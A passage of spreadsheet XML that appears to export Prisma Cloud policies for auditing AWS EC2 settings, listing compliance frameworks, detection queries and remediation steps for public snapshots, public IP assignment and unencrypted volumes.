        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name='aws-ec2-describe-snapshots' AND json.rule='createVolumePermissions[*].group contains all'</t>
        </is>
      </c>
      <c r="AA1841" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1841" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1841" t="inlineStr"/>
      <c r="AD1841" t="b">
        <v>0</v>
      </c>
      <c r="AE1841" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1841" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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41" t="inlineStr">
        <is>
          <t>cdea5c1c-6384-4086-95f0-d292e2f67753</t>
        </is>
      </c>
      <c r="AI1841" t="inlineStr">
        <is>
          <t>4ad5c67e-eb77-4426-a522-5e57ed846dbb</t>
        </is>
      </c>
      <c r="AJ1841" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1841" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1842">
      <c r="A1842" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, HITRUST CSF v9.3 [Deprecated], kfirdaus AWS Account-CS, ISO/IEC 27001:2022, GDPR, APRA (CPS 234) Information Security, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, NIST 800-53 Rev 5, MLPS 2.0, NIST CSF, NIST CSF v2.0, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, NIST 800-171 Rev1, HITRUST CSF v9.3 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v8.2 [Deprecated], GDPR, jbrox - GDPR, APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Korea – Information Security Management System (ISMS), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v10.0 [Deprecated], HITRUST CSF v9.3 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v4.0.12, HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), ISO 27001:2013, TX-RAMP Level 2, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v12, SOC 2, ITSG-33, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CDC NIST 800-53 Rev4, NIST 800-53 Rev4, NIST 800-53 Rev 5, CyberSecurity Law of the People's Republic of China, Insurance Regulatory And Development Authority Of India, SOC 2, ISO 27001:2013, Matt's ATT&amp;ACK, NIST SP 800-171 Revision 3, PCI DSS v4.0, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-171 Revision 3, MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, Risk Management in Technology (RMiT), CIS Controls v8, NIST 800-171 Rev1, CyberSecurity Law of the People's Republic of China, MITRE ATT&amp;CK v6.3 [Deprecated], SOC 2, kfirdaus AWS Account-CS, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, jbrox - GDPR, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ISO/IEC 27001:2022, NIST 800-53 Rev4, MLPS 2.0 (Level 3), HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2024.2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Sarbanes Oxley Act (SOX), ISO 27001:2013, APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, CIS Controls v7.1, CyberSecurity Law of the People's Republic of China, Secure Controls Framework (SCF) - 2022.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CHC HITRUST CSF v.9.6.0, NIST CSF, PIPEDA, ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, SOC 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST CSF v.9.6.0, kashan ACSC Information Security Manual (ISM), CSA CCM v3.0.1, MAS TRM 2021, CCPA 2018, ACSC Information Security Manual (ISM), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ACSC Information Security Manual (ISM), NIST 800-171 Rev1, NIST CSF, Brazilian Data Protection Law (LGPD), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, kfirdaus AWS Account-CS, CSA CCM v3.0.1, NIST 800-171 Rev1, Australian Energy Sector Cyber Security Framework (AESCSF), HITRUST CSF v.9.6.0, PCI DSS v3.2.1, MITRE ATT&amp;CK v6.3 [Deprecated], NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B1842" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1842" s="2" t="inlineStr"/>
      <c r="D1842" t="inlineStr"/>
      <c r="E1842" t="inlineStr"/>
      <c r="F1842" t="inlineStr"/>
      <c r="G1842" t="b">
        <v>1</v>
      </c>
      <c r="H18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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1842" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1842" t="inlineStr">
        <is>
          <t>AWS EBS snapshots are accessible to public</t>
        </is>
      </c>
      <c r="L1842" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1842" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1842" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1842" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1842" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1842" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1842" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S1842" t="inlineStr">
        <is>
          <t>PCI DSS v3.2,Retain_Severity</t>
        </is>
      </c>
      <c r="T1842" t="b">
        <v>1</v>
      </c>
      <c r="U1842" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1842" t="inlineStr">
        <is>
          <t>aws-ec2-describe-snapshots</t>
        </is>
      </c>
      <c r="W1842" t="inlineStr">
        <is>
          <t>This policy identifies EC2 EBS snapshots which are accessible to public. Amazon Elastic Block Store (Amazon EBS) provides persistent block storage volumes for use with Amazon EC2 instances in the AWS Cloud. If EBS snapshots are inadvertently shared to public, any unauthorized user with AWS console access can gain access to the snapshots and gain access to sensitive data.</t>
        </is>
      </c>
      <c r="X1842" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to 'EC2' service.
4. Under the 'Elastic Block Storage', click on the 'Snapshots'.
5. For the specific Snapshots, change the value of field 'Property' to 'Private'.
6. Under the section 'Encryption Details', set the value of 'Encryption Enabled' to 'Yes'.</t>
        </is>
      </c>
      <c r="Y1842" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'ec2:ModifySnapshotAttribute' permission. Successful execution will make this EBS snapshot's access to private. This will ensure that only Owner has full privileges.",
'impact': 'make this EBS snapshot private',
'cliScriptTemplate': 'aws ec2 --region $region modify-snapshot-attribute --snapshot-id $resourceId --attribute createVolumePermission --operation-type remove --group-names all'</t>
        </is>
      </c>
      <c r="Z1842" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name='aws-ec2-describe-snapshots' AND json.rule='createVolumePermissions[*].group contains all'</t>
        </is>
      </c>
      <c r="AA1842" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1842" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1842" t="inlineStr">
        <is>
          <t>PC-AWS-EC2-31</t>
        </is>
      </c>
      <c r="AD1842" t="b">
        <v>1</v>
      </c>
      <c r="AE1842" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1842" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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2" t="inlineStr">
        <is>
          <t>7c714cb4-3d47-4c32-98d4-c13f92ce4ec5</t>
        </is>
      </c>
      <c r="AI1842" t="inlineStr">
        <is>
          <t>7c714cb4-3d47-4c32-98d4-c13f92ce4ec5</t>
        </is>
      </c>
      <c r="AJ1842" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1842" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1843">
      <c r="A1843" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, HITRUST CSF v9.3 [Deprecated], ISO/IEC 27001:2022, GDPR, APRA (CPS 234) Information Security, CSA CCM v3.0.1, ISO 27002:2022, NIST 800-53 Rev 5, NIST CSF, NIST CSF v2.0, RBI Baseline Cyber Security and Resilience Requirements, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, NIST SP 800-172, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MLPS 2.0, NIST 800-171 Rev1, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), GDPR, jbrox - GDPR, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, TX-RAMP Level 1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v9.3 [Deprecated], Microsoft Cloud Security Benchmark v1,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TX-RAMP Level 1, SOC 2, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, NIST 800-53 Rev4, NIST 800-53 Rev 5, SOC 2, ISO 27001:2013, CIS Controls v7.1, NIST SP 800-171 Revision 3, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CyberSecurity Law of the People's Republic of China, NIST SP 800-171 Revision 3, CHC HITRUST CSF v.9.6.0, PCI DSS v4.0, NIST CSF, NIST SP 800-171 Revision 3, NIST CSF, Insurance Regulatory And Development Authority Of India, Copy of CIS Controls v8, CRI Profile v1.2.1, PCI DSS v3.2.1, Risk Management in Technology (RMiT), CyberSecurity Law of the People's Republic of China, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CRI Profile v2.0, NIST 800-171 Rev1, SOC 2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, jbrox - GDPR, ISO/IEC 27001:2022, NIST 800-53 Rev4, HITRUST CSF v9.3 [Deprecated], Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CDC NIST 800-53 Rev4, NIST CSF, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], TX-RAMP Level 2, ISO 27002:2022, Secure Controls Framework (SCF) - 2024.2, Copy of CIS Controls v8, SOC 2, Copy of ACSC Information Security Manual (ISM)-clone, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v.9.6.0, CSA CCM v3.0.1, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MLPS 2.0 (Level 3), NIST 800-171 Rev1, kfirdaus AWS Account-CS, NIST CSF, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Brazilian Data Protection Law (LGPD), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CyberSecurity Law of the People's Republic of China, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST SP 800-171 Revision 2, FFIEC, NIST SP 800-172, CSA CCM v3.0.1, TX-RAMP Level 2, NIST 800-171 Rev1, Australian Energy Sector Cyber Security Framework (AESCSF), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1843" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1843" s="2" t="inlineStr"/>
      <c r="D1843" t="inlineStr"/>
      <c r="E1843" t="inlineStr"/>
      <c r="F1843" t="inlineStr"/>
      <c r="G1843" t="b">
        <v>1</v>
      </c>
      <c r="H18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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1843" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1843" t="inlineStr">
        <is>
          <t>AWS EBS Snapshot with access for unmonitored cloud accounts</t>
        </is>
      </c>
      <c r="L1843" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1843" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1843" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1843" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1843" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1843" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1843" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1843" t="inlineStr"/>
      <c r="T1843" t="b">
        <v>0</v>
      </c>
      <c r="U1843" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1843" t="inlineStr">
        <is>
          <t>aws-ec2-describe-snapshots</t>
        </is>
      </c>
      <c r="W1843" t="inlineStr">
        <is>
          <t>This policy identifies EBS Snapshot with access for unmonitored cloud accounts.The EBS Snapshots which have either the read / write permission opened up for Cloud Accounts which are NOT part of Cloud Accounts monitored by Prisma Cloud. These accounts with read / write privileges should be reviewed and confirmed that these are valid accounts of your organisation (or authorised by your organisation) and are not active under Prisma Cloud monitoring.</t>
        </is>
      </c>
      <c r="X1843" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console.
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated.
3. Access the EC2 service, navigate to 'Snapshots' under 'Elastic Block Store' in left hand menu.
4. Select the identified 'EBS Snapshot' and select the tab 'Permissions'.
5. Review and delete the AWS Accounts which should not have read access.</t>
        </is>
      </c>
      <c r="Y1843" t="inlineStr"/>
      <c r="Z1843" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-snapshots' AND json.rule = 'snapshot.state equals completed and createVolumePermissions[*].userId size != 0 and _AWSCloudAccount.isRedLockMonitored($.createVolumePermissions[*].userId) is false'</t>
        </is>
      </c>
      <c r="AA1843" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1843" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1843" t="inlineStr">
        <is>
          <t>PC-AWS-EC2-61</t>
        </is>
      </c>
      <c r="AD1843" t="b">
        <v>1</v>
      </c>
      <c r="AE1843" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1843" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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3" t="inlineStr">
        <is>
          <t>861f7435-ffe4-750f-b07f-2a1cb882dbc8</t>
        </is>
      </c>
      <c r="AI1843" t="inlineStr">
        <is>
          <t>861f7435-ffe4-750f-b07f-2a1cb882dbc8</t>
        </is>
      </c>
      <c r="AJ1843" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1843" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1844">
      <c r="A1844" t="inlineStr"/>
      <c r="B1844" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1844" s="2" t="inlineStr"/>
      <c r="D1844" t="inlineStr"/>
      <c r="E1844" t="inlineStr"/>
      <c r="F1844" t="inlineStr"/>
      <c r="G1844" t="b">
        <v>0</v>
      </c>
      <c r="H18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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1844" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1844" t="inlineStr">
        <is>
          <t>Copy of AWS VPC subnets should not allow automatic public IP assignment</t>
        </is>
      </c>
      <c r="L1844" t="inlineStr"/>
      <c r="M1844" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1844" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1844" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1844" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1844" t="inlineStr"/>
      <c r="R1844" t="inlineStr"/>
      <c r="S1844" t="inlineStr"/>
      <c r="T1844" t="b">
        <v>0</v>
      </c>
      <c r="U1844" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1844" t="inlineStr">
        <is>
          <t>aws-ec2-describe-subnets</t>
        </is>
      </c>
      <c r="W1844" t="inlineStr">
        <is>
          <t>This policy identifies VPC subnets which allow automatic public IP assignment. VPC subnet is a part of the VPC having its own rules for traffic. Assigning the Public IP to the subnet automatically (on launch) can accidentally expose the instances within this subnet to internet and should be edited to 'No' post creation of the Subnet.</t>
        </is>
      </c>
      <c r="X1844" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console.
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated.
3. Navigate to the 'VPC' service.
4. In the navigation pane, click on 'Subnets'.
5. Select the identified Subnet and choose the option 'Modify auto-assign IP settings' under the Subnet Actions.
6. Disable the 'Auto-Assign IP' option and save it.</t>
        </is>
      </c>
      <c r="Y1844" t="inlineStr"/>
      <c r="Z1844" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'AWS' and api.name = 'aws-ec2-describe-subnets' AND json.rule = 'mapPublicIpOnLaunch is true'</t>
        </is>
      </c>
      <c r="AA1844" t="inlineStr">
        <is>
          <t>Josh Perakis</t>
        </is>
      </c>
      <c r="AB1844" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1844" t="inlineStr"/>
      <c r="AD1844" t="b">
        <v>0</v>
      </c>
      <c r="AE1844" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1844" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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4" t="inlineStr">
        <is>
          <t>7828d6d0-ea80-413a-a15b-7960b2e5a435</t>
        </is>
      </c>
      <c r="AI1844" t="inlineStr">
        <is>
          <t>11743cd3-35e4-4639-91e1-bc87b52d4cf5</t>
        </is>
      </c>
      <c r="AJ1844" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1844" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1845">
      <c r="A1845" t="inlineStr"/>
      <c r="B1845" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1845" s="2" t="inlineStr"/>
      <c r="D1845" t="inlineStr"/>
      <c r="E1845" t="inlineStr"/>
      <c r="F1845" t="inlineStr"/>
      <c r="G1845" t="b">
        <v>0</v>
      </c>
      <c r="H18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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1845" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1845" t="inlineStr">
        <is>
          <t>Jon's Unencrypted Ec2 Volume Policy</t>
        </is>
      </c>
      <c r="L1845" t="inlineStr"/>
      <c r="M1845" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1845" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1845" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1845" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1845" t="inlineStr"/>
      <c r="R1845" t="inlineStr"/>
      <c r="S1845" t="inlineStr">
        <is>
          <t>Ec2,Unencrypted,Custom</t>
        </is>
      </c>
      <c r="T1845" t="b">
        <v>0</v>
      </c>
      <c r="U1845" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1845" t="inlineStr">
        <is>
          <t>aws-ec2-describe-volumes</t>
        </is>
      </c>
      <c r="W1845" t="inlineStr">
        <is>
          <t>Shows all unencrypted Ec2 Volumes</t>
        </is>
      </c>
      <c r="X1845" t="inlineStr">
        <is>
          <t>Go into the Ec2 instance to encrypt
1. Log Into AWS
2. Go to Ec2 Instance in question
3. Encrypt the instance</t>
        </is>
      </c>
      <c r="Y1845" t="inlineStr"/>
      <c r="Z1845" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.account = 'pcs-aws-lab01' AND api.name = 'aws-ec2-describe-volumes' AND json.rule = encrypted is false</t>
        </is>
      </c>
      <c r="AA1845" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB1845" t="inlineStr">
        <is>
          <t>2024-11-19 10:55:32</t>
        </is>
      </c>
      <c r="AC1845" t="inlineStr"/>
      <c r="AD1845" t="b">
        <v>0</v>
      </c>
      <c r="AE1845" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1845" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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5" t="inlineStr">
        <is>
          <t>170eb467-6266-49b3-9ab1-e3a39fb1afe4</t>
        </is>
      </c>
      <c r="AI1845" t="inlineStr">
        <is>
          <t>23319136-842f-404c-8906-6d95521c4f37</t>
        </is>
      </c>
      <c r="AJ1845" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1845" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1846">
      <c r="A1846" t="inlineStr">
        <is>
          <t>myteststandard</t>
        </is>
      </c>
      <c r="B1846" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1846" s="2" t="inlineStr"/>
      <c r="D1846" t="inlineStr"/>
      <c r="E1846" t="inlineStr"/>
      <c r="F1846" t="inlineStr"/>
      <c r="G1846" t="b">
        <v>0</v>
      </c>
      <c r="H18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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1846" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1846" t="inlineStr">
        <is>
          <t>myteststandardpolicy</t>
        </is>
      </c>
      <c r="L1846" t="inlineStr"/>
      <c r="M1846" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1846" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1846" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1846" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1846" t="inlineStr">
        <is>
          <t>Storage</t>
        </is>
      </c>
      <c r="R1846" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
      <c r="S1846" t="inlineStr">
        <is>
          <t>Storage,EBS</t>
        </is>
      </c>
      <c r="T1846" t="b">
        <v>0</v>
      </c>
      <c r="U1846" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1846" t="inlineStr">
        <is>
          <t>aws-ec2-describe-volumes</t>
        </is>
      </c>
      <c r="W1846" t="inlineStr"/>
      <c r="X1846" t="inlineStr"/>
      <c r="Y1846" t="inlineStr"/>
      <c r="Z1846" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-volumes' and cloud.type= 'aws' AND json.rule = ' encrypted is false and attachments[*].device does not contain sda1 and attachments[*].device does not contain xvda'</t>
        </is>
      </c>
      <c r="AA1846" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1846" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1846" t="inlineStr"/>
      <c r="AD1846" t="b">
        <v>0</v>
      </c>
      <c r="AE1846" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1846" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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6" t="inlineStr">
        <is>
          <t>54dc1bef-62c0-4f5d-b208-8c27e5fcb3eb</t>
        </is>
      </c>
      <c r="AI1846" t="inlineStr">
        <is>
          <t>38c2abc5-653e-496b-9485-93def1e59401</t>
        </is>
      </c>
      <c r="AJ1846" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1846" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1847">
      <c r="A1847" t="inlineStr"/>
      <c r="B1847" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1847" s="2" t="inlineStr"/>
      <c r="D1847" t="inlineStr"/>
      <c r="E1847" t="inlineStr"/>
      <c r="F1847" t="inlineStr"/>
      <c r="G1847" t="b">
        <v>1</v>
      </c>
      <c r="H18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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1847" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1847" t="inlineStr">
        <is>
          <t>Bpachauli sample policy</t>
        </is>
      </c>
      <c r="L1847" t="inlineStr"/>
      <c r="M1847" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1847" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1847" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1847" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1847" t="inlineStr"/>
      <c r="R1847" t="inlineStr"/>
      <c r="S1847" t="inlineStr">
        <is>
          <t>marclabel,SEC-01-01</t>
        </is>
      </c>
      <c r="T1847" t="b">
        <v>0</v>
      </c>
      <c r="U1847" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1847" t="inlineStr">
        <is>
          <t>aws-ec2-describe-volumes</t>
        </is>
      </c>
      <c r="W1847" t="inlineStr">
        <is>
          <t>Checks for unencrypted volumes of ec2 instances</t>
        </is>
      </c>
      <c r="X1847" t="inlineStr"/>
      <c r="Y1847" t="inlineStr"/>
      <c r="Z1847" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.account = 'pcs-aws-lab01' AND api.name = 'aws-ec2-describe-volumes' AND json.rule = encrypted is false</t>
        </is>
      </c>
      <c r="AA1847" t="inlineStr">
        <is>
          <t>Marc Lawrence</t>
        </is>
      </c>
      <c r="AB1847" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1847" t="inlineStr"/>
      <c r="AD1847" t="b">
        <v>0</v>
      </c>
      <c r="AE1847" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1847" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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7" t="inlineStr">
        <is>
          <t>3eaa7c8c-e83d-4f45-8c4a-782deab45ea6</t>
        </is>
      </c>
      <c r="AI1847" t="inlineStr">
        <is>
          <t>6fa7d2df-86d9-4cf6-9110-1b13809487e8</t>
        </is>
      </c>
      <c r="AJ1847" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
